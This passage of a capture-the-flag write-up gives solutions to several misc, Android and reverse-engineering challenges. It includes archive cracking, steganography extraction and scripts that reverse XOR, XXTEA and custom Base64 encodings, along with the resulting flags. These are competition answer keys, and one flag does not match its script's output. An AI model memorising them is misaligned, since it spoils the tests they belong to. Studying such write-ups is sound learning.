                print(i, j, k)
                for l in range(1, 100000):
                    f.write(str(i*l) + ':' + str(j*l) + ':' + str(k*l) + '\n')

Archpr cracks it successfully and gives the extraction password 37035:49380:61725, i.e. the ratio is 123456

Extract to get the flag

666

The attachment is a password-protected archive; run binwalk on it to carve out the embedded files

This yields an image

Use steghide to extract further from the image; the weak password is 123456

After getting the image, modify its width and height to reveal the extraction password

Extracting gives a packet capture

Analyze the TCP streams in Wireshark; packet 17 contains a URL

Visiting it returns a GIF

The GIF contains ciphertext; decode it

SElERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA==

Base64-decoded: HIDEkey:852 987456321 98423 98423 REALkey:xSxx

pQLKpP/EPmw301eZRzuYvQ==

AES-decrypt it to get the flag

Mobile

MobileA

The flag has two parts; the first part is AES-encrypted

K@e2022%%y   S0BlMjAyMiUleQ==
I&V2022***    SSZWMjAyMioqKg==
/c/ua543HrY7vfzoYfHz+nfXEsDVQ4ph+yD9gu5mAlY=
vftyujmnbv*_rtyujk_

Script for the second part

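#include <stdio.h>
#include <string.h>

int main(){
    char base64[] = "=pX19GV=QooOeCquHjrkMGSY";
    char flag[25] = {0};  // 24 characters plus the terminating NUL that puts() needs
    int n = 0;
    // refill a 4x6 grid column by column, last column first:
    // odd columns bottom-up, even columns top-down
    for (int i = 5; i >= 0; i--) {
        if (i % 2 == 1) {
            for (int j = 3; j >= 0; j--) {
                flag[j*6+i] = base64[n];
                n++;
            }
        }
        else {
            for (int z = 0; z <= 3; z++) {
                flag[z*6+i] = base64[n];
                n++;
            }
        }
    }
    puts(flag);
}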

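Base64-decode the result, then reverse the resulting MD5 hash to get the second part

MobileB

The flag is encrypted twice and then compared with a string

The first encryption uses a native call into an underlying .so file; extract the file and analyze the .so in IDA to find the main logic

The .so looks up each character's position in the given string table and then takes the character at that position plus 9.

The second encryption converts each character to a value and separates the values with 0

Write the script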

key = "52405240520120520134034020134030120130"
content = ["FIXBMTURVPYJGZOQNKASEWCHLD","UVBXSAFJDGHICZOPQRWELKTMNY","PZGNVYDEFIJCBKARLUQHMWXOST",
           "FBSPMACKDRQITWHZLJXYGENOUV","DTINKLUJCOMEQRAPGSXYFZBHVW","XAMTFIRBVHEJSCDYZPKLNQGUOW",
           "EVRYXJACTZGHWOPQSIBUMNDFLK","VWQGHLZBJEUYFPCSTNIKAXMORD","FJNVWSTDXYUKMBCZLIGOPEHAQR",
           "NSKBRTUZEJOPGIFXCDAVWQYLMH","ASTKPZJDCLYMVHXBNWIUOQGREF","LZWXEHIMFUOPKJGAYTNCBDRSQV"]
table = {'5':'a', '1':'b', '51':'c', '2':'d', '52':'e', '12':'f', '512':'g', '3':'h', '53':'i', '13':'j', '513':'k', '23':'l', '523':'m', '123':'n', '5123':'o', '4':'p', '54':'q', '14':'r', '514':'s', '24':'t', '524':'u', '124':'v', '5124':'w', '34':'x', '534':'y', '134':'z', '5':'A', '1':'B', '51':'C', '2':'D', '52':'E', '12':'F', '512':'G', '3':'H', '53':'I', '13':'J', '513':'K', '23':'L', '523':'M', '123':'N', '5123':'O', '4':'P', '54':'Q', '14':'R', '514':'S', '24':'T', '524':'U', '124':'V', '5124':'W', '34':'X', '534':'Y', '134':'Z'}
m = ""
codes = key[:-1].split('0')   # drop the trailing separator, then split the digit groups on 0
for i in codes:
    m = m + table[i]
print(m)
iv = [0x3, 0xc, 0x6, 0x8, 0x7, 0x2, 0x4, 0xb, 0x1, 0x5, 0x9, 0xa]
v = []
for i in range(12):
    index = content[iv[i]-1].index(m[i])
    v.append(index)
print(v)

flag = ""
for j in range(12):
    flag += content[iv[j]-1][(v[j]-9)%26]
print(flag)

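This gives the flag

ISCC{FLAGISREMAIN}

Mobile Analysis

The input string is first Base64-encoded and then split into three parts: 0-16, 16-32 and 32-(len-1). The first part goes to function m14 of C0541B, the last two go to function m15 of C0541B

In C0541B, m14 transposes the string it receives in groups of three characters. m15 encrypts the two strings it receives separately: one is compared with the return value of m16 in C0542C, the other is AES-encrypted and compared with the given string

Working backwards in m14 from the comparison string gives the first part of the Base64-encoded string

SVNDQ3tkaXNwbGFj

For a in m14, simply run function m16 of C0542C to produce the string

The string is

J0tpzHRuhTQpLauS

The key is now known as well, the IV is given and the AES ciphertext is available, so string b can be decrypted directly

otG28PYN8CtG

With a and b in hand, only functions m12 and m13 in C504A remain to be examined

These two functions substitute characters using two different tables. First use the tables to find the string each one maps to, then decode to get a and b as they were before encryption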

// wrapper class added so that the snippet compiles on its own
public class Solve {
    // substitution as decompiled: table index -> (5 * index + 8) % 64
    public static String m12a(String str) {
        String str2 = "";
        for (int i = 0; i < str.length(); i++) {
            if ("cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".indexOf(str.charAt(i)) != -1) {
                str2 = str2 + "cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".charAt(((5 * "cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".indexOf(str.charAt(i))) + 8) % 64);
            } else {
                str2 = str2 + str.charAt(i);
            }
        }
        return str2;
    }

    // inverse of m12a: "g6df..." is m12a applied to the standard alphabet, so look the character up there
    public static String enm12a(String str) {
        String str2 = "";
        for (int i = 0; i < str.length(); i++) {
            if ("cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".indexOf(str.charAt(i)) != -1) {
                str2 = str2 + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/=".charAt("g6dfYnaH9qFiIoby5RlZB0WAxJVzhLOD2p4w=uT/rmcGjkMC1X7ePsSKNQ3v8tUE".indexOf(str.charAt(i)));
            } else {
                str2 = str2 + str.charAt(i);
            }
        }
        return str2;
    }

    // same substitution as m12a, with a different table
    public static String m13b(String str) {
        String str2 = "";
        for (int i = 0; i < str.length(); i++) {
            if ("cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".indexOf(str.charAt(i)) != -1) {
                str2 = str2 + "cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".charAt(((5 * "cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".indexOf(str.charAt(i))) + 8) % 64);
            } else {
                str2 = str2 + str.charAt(i);
            }
        }
        return str2;
    }

    // inverse of m13b, built the same way as enm12a
    public static String enm13b(String str) {
        String str2 = "";
        for (int i = 0; i < str.length(); i++) {
            if ("cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".indexOf(str.charAt(i)) != -1) {
                str2 = str2 + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/=".charAt("6lTD9AC/5YQIinxbw3cs4tUXfoF8egj1EdMyLWkV=NRB02uqvrZhmJPpOza7KGHS".indexOf(str.charAt(i)));
            } else {
                str2 = str2 + str.charAt(i);
            }
        }
        return str2;
    }

    public static void main(String[] args) {
        // encrypting the standard alphabet yields the lookup strings used by enm12a / enm13b
        System.out.println(m12a("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/="));
        System.out.println(m13b("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/="));
        //g6dfYnaH9qFiIoby5RlZB0WAxJVzhLOD2p4w=uT/rmcGjkMC1X7ePsSKNQ3v8tUE
        //6lTD9AC/5YQIinxbw3cs4tUXfoF8egj1EdMyLWkV=NRB02uqvrZhmJPpOza7KGHS
        // decrypt a and b with the inverse functions
        System.out.println(enm12a("J0tpzHRuhTQpLauS"));
        System.out.println(enm13b("otG28PYN8CtG"));
        //ZV9hbHRlcm5hdGl2
        //ZV9tb2JpbGV9
    }
}

This gives the Base64-encoded string

SVNDQ3tkaXNwbGFjZV9hbHRlcm5hdGl2ZV9tb2JpbGV9

Decoding gives the flag

ISCC{displace_alternative_mobile}
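
The substitution in m12a and m13b is an affine map on table indices, so it can also be inverted arithmetically rather than through lookup strings. The following is an added example, not part of the original write-up: the function and constant names are hypothetical, while the tables and ciphertexts are the ones shown on this page.

```python
import base64

# Substitution tables copied from the decompiled m12a / m13b shown on this page.
TABLE_A = "cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678="
TABLE_B = "cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv"

MUL, ADD, MOD = 5, 8, 64        # forward map: index -> (5 * index + 8) % 64
MUL_INV = pow(MUL, -1, MOD)     # 13, because 5 * 13 = 65 = 1 (mod 64)


def affine_encrypt(text, table):
    """Forward direction as in m12a/m13b; characters outside the table pass through."""
    out = []
    for ch in text:
        idx = table.find(ch)
        out.append(ch if idx < 0 else table[(MUL * idx + ADD) % MOD])
    return "".join(out)


def affine_decrypt(text, table):
    """Inverse map: index -> 13 * (index - 8) % 64, valid because gcd(5, 64) = 1."""
    out = []
    for ch in text:
        idx = table.find(ch)
        out.append(ch if idx < 0 else table[(MUL_INV * (idx - ADD)) % MOD])
    return "".join(out)


def recover_flag(part1, enc_a, enc_b):
    """Join the three Base64 fragments (part1 is already plain) and decode them."""
    b64 = part1 + affine_decrypt(enc_a, TABLE_A) + affine_decrypt(enc_b, TABLE_B)
    return base64.b64decode(b64).decode("ascii")


if __name__ == "__main__":
    # part1, a and b are the three strings recovered earlier in this write-up
    print(recover_flag("SVNDQ3tkaXNwbGFj", "J0tpzHRuhTQpLauS", "otG28PYN8CtG"))
```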

reverse

GetTheTable

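Open in 64-bit IDA

This is Base58 encoding with the standard alphabet; decoding it directly gives the flag

ISCC{Jg19fn97QBoki}

Amy's Code

Open in 32-bit IDA

There are two encryption routines, sub_4115FF and sub_411433

The XOR algorithm in sub_4115FF

The algorithm in sub_411433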

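#include <stdio.h>
#include <string.h>

int main(){
    char c[] = "LWHFUENGDJGEFHYDHIGJ";
    // unsigned char holds the values above 127; the trailing 0 terminates the string for puts()
    unsigned char flag[] = { 149, 169, 137, 134, 212, 188, 177, 184, 177, 197, 192, 179, 153, 162, 148, 137, 196,
                             140, 188, 184, 0 };
    for (int i = 0; i < (int)strlen(c); i++) {
        flag[i] = (flag[i] - c[i]) ^ i;  // subtract the key byte, then XOR with the index
    }
    puts((char *)flag);
}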

This gives the flag

How_decode

Open in 64-bit IDA

The input is encrypted and then compared

The encryption is XXTEA

#include <stdint.h>
#include <stdio.h>
#define DELTA 0x9e3779b9
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))

// XXTEA decryption over len 32-bit words, in place.
// Note: the words are int32_t here, so >> on a negative word is an arithmetic shift;
// the reference XXTEA implementation uses uint32_t.
static int32_t * xxtea_uint_decrypt(int32_t * data, size_t len, int32_t * key) {
    int32_t n = (uint32_t)len - 1;
    int32_t z, y = data[0], p, q = 6 + 52 / (n + 1), sum = q * DELTA, e;

    if (n < 1) return data;

    while (sum != 0) {
        e = sum >> 2 & 3;

        for (p = n; p > 0; p--) {
            z = data[p - 1];
            y = data[p] -= MX;
        }

        z = data[n];
        y = data[0] -= MX;
        sum -= DELTA;
    }

    return data;
}

int main(){
    int32_t v[] =
    {0x7D90FB64,0x587DD5DD,0xC256EE5B,0xEC70DCC,0x79DCE37E,0x42BEA10,0xAF16032,0xC264DCB8,0x2DE09F8D,0xDEEC4C0C,0x5B35F4BF,0x6FE8E678,0x505856E7,0xEA467BD,0x3E21E33A,0xF5A48DBE,0xCED748C2,0xFE460D71};
    int32_t k[4] = { 73, 83, 67, 67 };  // "ISCC"
    int n = 18;
    xxtea_uint_decrypt(v, n, k);
    // each decrypted word is printed as one character
    for (int i = 0; i < 18; i++)
        printf("%c", v[i]);
    return 0;
}

Sad Code

Open in 32-bit IDA; solving the two systems of equations gives the flag

import binascii
import z3

a = z3.Real('a')
b = z3.Real('b')
c = z3.Real('c')
d = z3.Real('d')
s = z3.Solver()
s.add(c + 7 * b - 4 * a - 2 * d == 0x1D672E030)
s.add(5 * d + 3 * c - b - 2 * a == 0x150C28A7F)
s.add(2 * b + 8 * d + 10 * a - 5 * c == 0x51EE148A4)
s.add(7 * a + 15 * b - 3 * d - 2 * c == 0x7C12A2C80)
if s.check() == z3.sat:
    result = s.model()
    print(result)  #[b = 2068009560,a = 1230193475,d = 1378700867,c = 1094928730]
else:
    print('no result')

a = z3.Real('a')
b = z3.Real('b')
c = z3.Real('c')
d = z3.Real('d')
s = z3.Solver()
s.add(15*a + 35*d - b - c == 0xF919FB032)
s.add(38*c + a + d - 24*b == 0x7060508FA)
s.add(38*b + 32*a - c - d == 0x124F561560)
s.add(a + 41*c - b - 25*d == 0x51C97373E)
if s.check() == z3.sat:
    result = s.model()
    print (result)  #[b = 1095576901,a = 1245988943,d = 1448236925,c = 1414878529]
else:
    print ('no result')

z31 = [2068009560,1230193475,1378700867,1094928730]
z32 = [1095576901,1245988943,1448236925,1414878529]
b = binascii.a2b_hex(hex(z31[0])[2:])
a = binascii.a2b_hex(hex(z31[1])[2:])
d = binascii.a2b_hex(hex(z31[2])[2:])
c = binascii.a2b_hex(hex(z31[3])[2:])
flag = a + b +c + d
b = binascii.a2b_hex(hex(z32[0])[2:])
a = binascii.a2b_hex(hex(z32[1])[2:])
d = binascii.a2b_hex(hex(z32[2])[2:])
c = binascii.a2b_hex(hex(z32[3])[2:])
flag += a + b +c + d
print(flag)     #ISCC{CRXACIZR-NCJDHOAM-ETUUAVRW}

Bob's Code

Open in 32-bit IDA; the program inserts dots and cyclically shifts the string

sub_4116E0

#include <stdio.h>
#include <string.h>

int main(){
    char Str2[] = ".W1BqthGbebXtc1X4XY0yo.M15ojfYXMRxBYUzVXhVoXXrX05vVY01fhtkoF0.";
    // shift every letter by 24 positions within its own case; other characters are left alone
    for (int i = 0; i < (int)strlen(Str2); i++) {
        if (Str2[i] < 65 || Str2[i] > 90) {
            if (Str2[i] >= 97 && Str2[i] <= 122)
                Str2[i] = (Str2[i] + 24 - 97) % 26 + 97;
        }
        else {
            Str2[i] = (Str2[i] + 24 - 65) % 26 + 65;
        }
    }
    puts(Str2);
}

Result

.U1ZorfEzczjJrKZWVMxgr.WVTmDfHmNBZY2PVmLrTmUnorLZ3YVrKmE5imD0.

sub_411023 removes the dots (.)

sub_41138

ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_

Find the original alphabet table, then decrypt

Decoding the string with the substituted alphabet gives

SVNDQ3s2cFFVVlFEeS01a2pYcjU2TS1CNFVwaTd0NH0=

Then decode it with the standard Base64 alphabet
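
The last two steps (dot removal, custom-alphabet decoding, standard Base64 decoding) can be reproduced offline. This is an added example, not part of the original write-up: the function names are hypothetical, and the alphabet and the dotted string are the ones shown on this page.

```python
import base64

# Alphabet shown on this page for sub_41138, and the standard Base64 alphabet.
CUSTOM = "ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Intermediate string from this page, dots still in place.
DOTTED = ".U1ZorfEzczjJrKZWVMxgr.WVTmDfHmNBZY2PVmLrTmUnorLZ3YVrKmE5imD0."


def decode_custom_b64(text, alphabet=CUSTOM):
    """Decode Base64 text that was produced with a permuted 64-character alphabet."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must contain 64 distinct characters")
    unknown = set(text) - set(alphabet)
    if unknown:
        raise ValueError(f"characters outside the alphabet: {sorted(unknown)}")
    # Map every symbol to the standard symbol with the same 6-bit value.
    std = text.translate(str.maketrans(alphabet, STANDARD))
    std += "=" * (-len(std) % 4)   # the string on this page carries no '=' padding
    return base64.b64decode(std, validate=True)


def solve(dotted=DOTTED):
    """Return (inner Base64 string, flag) for the dotted intermediate string."""
    inner = decode_custom_b64(dotted.replace(".", "")).decode("ascii")
    flag = base64.b64decode(inner, validate=True).decode("ascii")
    return inner, flag


if __name__ == "__main__":
    inner, flag = solve()
    print(inner)
    print(flag)
```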

Ruststr

The program compares strings

First the case is swapped

One is added to or subtracted from each character, depending on the situation

The data is changed according to the key

XOR operation

After Base decoding

Write the solve script

#include <stdio.h>
#include <string.h>

int main(){
    // unsigned char: the ciphertext and the XOR stream contain bytes above 0x7F
    unsigned char enc[] = {0xE4,0x2C,0xEC,0x6E,0xDD,0x51,0xA3,0xAD,0x68,0xCB,0x21,0x82,0x64,0x97,0x4E,0x0A,0x3E,0x4B,0x51,0x07,0x8F,0x79,0x60,0x5B,0x9B };
    unsigned char v[] = {0x9A, 0x78, 0xB6, 0x12, 0xBE, 0x66, 0x8D, 0xCF, 0x51, 0x9E,0x63, 0xCB, 0x4A, 0xD1, 0x1A, 0x59, 0x78, 0x1C, 0x17, 0x73,0xF2, 0x1D, 0x05, 0x2F, 0xF0, 0xD7, 0xB3, 0x22, 0x5D, 0xAD,0x0B, 0xE2,0};
    unsigned char key[] = {0x32, 0x63, 0x65, 0x61, 0x39, 0x66, 0x30, 0x34, 0x63, 0x36, 0x33, 0x62, 0x34, 0x32, 0x38, 0x33, 0x39, 0x34, 0x30, 0x65, 0x63, 0x30, 0x65, 0x36, 0x64, 0x32, 0x39, 0x62, 0x65, 0x32, 0x38, 0x64};
    int n = sizeof(enc);  // enc is not NUL-terminated, so strlen() cannot be used on it
    for (int i = 0; i < n; i++) {
        enc[i] ^= v[i];                          // undo the XOR
        if (((key[i] + 0xd0) & 0xff) > 0xa)      // key character is not a digit
            enc[i] -= 2;
        else
            enc[i] -= 1;
        if ((enc[i] >= 'a' && enc[i] <= 'z') || (enc[i] >= 'A' && enc[i] <= 'Z'))
            enc[i] ^= 0x20;                      // swap the case back
    }
    // the plaintext is stored reversed
    for (int i = n - 1; i >= 0; i--) {
        printf("%c", enc[i]);
    }
}

This gives the flag

ISCC{Reverse-gat7A-5BZxr}

VigenereLike

Two algorithms are applied and the result is compared

The first algorithm is an XOR

The second algorithm

One part is a Base encoding

The other combines each character of the string with the key by their positions in abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 to get the flag

First use the key to recover the Base-encoded string

#include <stdio.h>
#include <string.h>

char table[]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
int chat(char c){
    for(int i=0;i<strlen(table);i++){
        if(table[i]==c)
            return i;
    }
    return -1;  // character not in the table
}

int main(){
    char flag[]="rJFsLqVyFKYjHECgEOkcC6MAmQ9sMDr0ZommCrv";
    char key[]="ISCCYES";
    int n;

    for(int i=0;i<strlen(flag);i++){
        flag[i]=table[((chat(flag[i])-chat(key[i%7]))+63)%63];
    }
    puts(flag);//U2d1YXd1YiwwdX5zcmxJVy59V3FLeW0ybVFPV04

}

Base decoding gives

Sguawub,0u~srlIW.}WqKym2mQOWN

XOR it to get the flag

#include <stdio.h>
#include <string.h>
int main(){
    char enc[]="Sguawub,0u~srlIW.}WqKym2mQOWN";
    for(int i=0;i<strlen(enc);i++){
        enc[i]=enc[i]^(i%7+1);
    } 
    puts(enc);//Reverse-2vzvtkHU-yRwLxo1iTIPO
}

This gives the flag

ISCC{Reverse-2vzvtkHU-yRwLxo1i}